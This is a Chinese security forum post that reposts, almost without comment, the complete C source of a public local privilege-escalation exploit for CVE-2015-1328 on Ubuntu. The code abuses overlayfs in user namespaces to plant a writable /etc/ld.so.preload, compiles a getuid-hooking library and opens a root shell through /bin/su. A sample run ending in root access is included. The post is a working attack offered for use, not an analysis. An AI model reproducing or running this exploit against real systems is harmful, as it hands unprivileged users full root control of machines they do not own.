搜索
查看: 540|回复: 0

CVE-2015-1328(本地提权漏洞) -

[复制链接]

1839

主题

2255

帖子

1万

积分

管理员

Rank: 9Rank: 9Rank: 9

积分
11913
发表于 2015-6-17 10:52:37 | 显示全部楼层 |阅读模式
  1. /*
  2. # Exploit Title: ofs.c - overlayfs local root in ubuntu
  3. # Date: 2015-06-15
  4. # Exploit Author: rebel
  5. # Version: Ubuntu 12.04, 14.04, 14.10, 15.04 (Kernels before 2015-06-15)
  6. # Tested on: Ubuntu 12.04, 14.04, 14.10, 15.04
  7. # CVE : CVE-2015-1328 (http://people.canonical.com/~ubuntu-security/cve/2015/CVE-2015-1328.html)

  8. *=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*
  9. CVE-2015-1328 / ofs.c
  10. overlayfs incorrect permission handling + FS_USERNS_MOUNT

  11. user@ubuntu-server-1504:~$ uname -a
  12. Linux ubuntu-server-1504 3.19.0-18-generic #18-Ubuntu SMP Tue May 19 18:31:35 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
  13. user@ubuntu-server-1504:~$ gcc ofs.c -o ofs
  14. user@ubuntu-server-1504:~$ id
  15. uid=1000(user) gid=1000(user) groups=1000(user),24(cdrom),30(dip),46(plugdev)
  16. user@ubuntu-server-1504:~$ ./ofs
  17. spawning threads
  18. mount #1
  19. mount #2
  20. child threads done
  21. /etc/ld.so.preload created
  22. creating shared library
  23. # id
  24. uid=0(root) gid=0(root) groups=0(root),24(cdrom),30(dip),46(plugdev),1000(user)

  25. greets to beist & kaliman
  26. 2015-05-24
  27. %rebel%
  28. *=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*
  29. */

  30. #include <stdio.h>
  31. #include <stdlib.h>
  32. #include <unistd.h>
  33. #include <sched.h>
  34. #include <sys/stat.h>
  35. #include <sys/types.h>
  36. #include <sys/mount.h>
  37. #include <stdio.h>
  38. #include <stdlib.h>
  39. #include <unistd.h>
  40. #include <sched.h>
  41. #include <sys/stat.h>
  42. #include <sys/types.h>
  43. #include <sys/mount.h>
  44. #include <sys/types.h>
  45. #include <signal.h>
  46. #include <fcntl.h>
  47. #include <string.h>
  48. #include <linux/sched.h>

  49. #define LIB "#include <unistd.h>\n\nuid_t(*_real_getuid) (void);\nchar path[128];\n\nuid_t\ngetuid(void)\n{\n_real_getuid = (uid_t(*)(void)) dlsym((void *) -1, "getuid");\nreadlink("/proc/self/exe", (char *) &path, 128);\nif(geteuid() == 0 && !strcmp(path, "/bin/su")) {\nunlink("/etc/ld.so.preload");unlink("/tmp/ofs-lib.so");\nsetresuid(0, 0, 0);\nsetresgid(0, 0, 0);\nexecle("/bin/sh", "sh", "-i", NULL, NULL);\n}\n return _real_getuid();\n}\n"

  50. static char child_stack[1024*1024];

  51. static int
  52. child_exec(void *stuff)
  53. {
  54. char *file;
  55. system("rm -rf /tmp/ns_sploit");
  56. mkdir("/tmp/ns_sploit", 0777);
  57. mkdir("/tmp/ns_sploit/work", 0777);
  58. mkdir("/tmp/ns_sploit/upper",0777);
  59. mkdir("/tmp/ns_sploit/o",0777);

  60. fprintf(stderr,"mount #1\n");
  61. if (mount("overlay", "/tmp/ns_sploit/o", "overlayfs", MS_MGC_VAL, "lowerdir=/proc/sys/kernel,upperdir=/tmp/ns_sploit/upper") != 0) {
  62. // workdir= and "overlay" is needed on newer kernels, also can't use /proc as lower
  63. if (mount("overlay", "/tmp/ns_sploit/o", "overlay", MS_MGC_VAL, "lowerdir=/sys/kernel/security/apparmor,upperdir=/tmp/ns_sploit/upper,workdir=/tmp/ns_sploit/work") != 0) {
  64. fprintf(stderr, "no FS_USERNS_MOUNT for overlayfs on this kernel\n");
  65. exit(-1);
  66. }
  67. file = ".access";
  68. chmod("/tmp/ns_sploit/work/work",0777);
  69. } else file = "ns_last_pid";

  70. chdir("/tmp/ns_sploit/o");
  71. rename(file,"ld.so.preload");

  72. chdir("/");
  73. umount("/tmp/ns_sploit/o");
  74. fprintf(stderr,"mount #2\n");
  75. if (mount("overlay", "/tmp/ns_sploit/o", "overlayfs", MS_MGC_VAL, "lowerdir=/tmp/ns_sploit/upper,upperdir=/etc") != 0) {
  76. if (mount("overlay", "/tmp/ns_sploit/o", "overlay", MS_MGC_VAL, "lowerdir=/tmp/ns_sploit/upper,upperdir=/etc,workdir=/tmp/ns_sploit/work") != 0) {
  77. exit(-1);
  78. }
  79. chmod("/tmp/ns_sploit/work/work",0777);
  80. }

  81. chmod("/tmp/ns_sploit/o/ld.so.preload",0777);
  82. umount("/tmp/ns_sploit/o");
  83. }

  84. int
  85. main(int argc, char **argv)
  86. {
  87. int status, fd, lib;
  88. pid_t wrapper, init;
  89. int clone_flags = CLONE_NEWNS | SIGCHLD;

  90. fprintf(stderr,"spawning threads\n");

  91. if((wrapper = fork()) == 0) {
  92. if(unshare(CLONE_NEWUSER) != 0)
  93. fprintf(stderr, "failed to create new user namespace\n");

  94. if((init = fork()) == 0) {
  95. pid_t pid =
  96. clone(child_exec, child_stack + (1024*1024), clone_flags, NULL);
  97. if(pid < 0) {
  98. fprintf(stderr, "failed to create new mount namespace\n");
  99. exit(-1);
  100. }

  101. waitpid(pid, &status, 0);

  102. }

  103. waitpid(init, &status, 0);
  104. return 0;
  105. }

  106. usleep(300000);

  107. wait(NULL);

  108. fprintf(stderr,"child threads done\n");

  109. fd = open("/etc/ld.so.preload",O_WRONLY);

  110. if(fd == -1) {
  111. fprintf(stderr,"exploit failed\n");
  112. exit(-1);
  113. }

  114. fprintf(stderr,"/etc/ld.so.preload created\n");
  115. fprintf(stderr,"creating shared library\n");
  116. lib = open("/tmp/ofs-lib.c",O_CREAT|O_WRONLY,0777);
  117. write(lib,LIB,strlen(LIB));
  118. close(lib);
  119. lib = system("gcc -fPIC -shared -o /tmp/ofs-lib.so /tmp/ofs-lib.c -ldl -w");
  120. if(lib != 0) {
  121. fprintf(stderr,"couldn't create dynamic library\n");
  122. exit(-1);
  123. }
  124. write(fd,"/tmp/ofs-lib.so\n",16);
  125. close(fd);
  126. system("rm -rf /tmp/ns_sploit /tmp/ofs-lib.c");
  127. execl("/bin/su","su",NULL);
  128. }
复制代码


过段时间可能会取消签到功能了
您需要登录后才可以回帖 登录 | Join BUC

本版积分规则

Powered by Discuz!

© 2012-2015 Baiker Union of China.

快速回复 返回顶部 返回列表